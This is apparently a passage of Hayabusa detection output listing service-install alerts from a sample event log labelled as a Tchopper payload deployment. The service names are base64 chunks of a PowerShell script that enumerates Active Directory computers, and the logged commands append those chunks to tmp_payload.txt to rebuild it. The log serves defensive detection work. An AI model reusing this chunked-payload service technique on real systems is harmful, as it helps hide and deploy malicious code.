dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:14.614 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell 
-command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:14.614 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:16.115 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:16.115 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:16.115 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:17.556 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:17.556 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 
bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:17.556 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:19.033 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:19.033 
+09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:19.033 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:20.486 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 17:20:20.486 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:20.486 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:22.080 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:22.080 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:22.080 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:23.533 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:23.533 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:23.533 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:24.976 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:24.976 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:24.976 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:26.423 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file 
-append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:26.423 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:26.423 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:27.868 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | 
select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:27.868 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:27.868 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:29.321 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell 
-command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:29.321 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:29.321 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:30.774 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:30.774 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:30.774 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:32.230 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:32.230 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 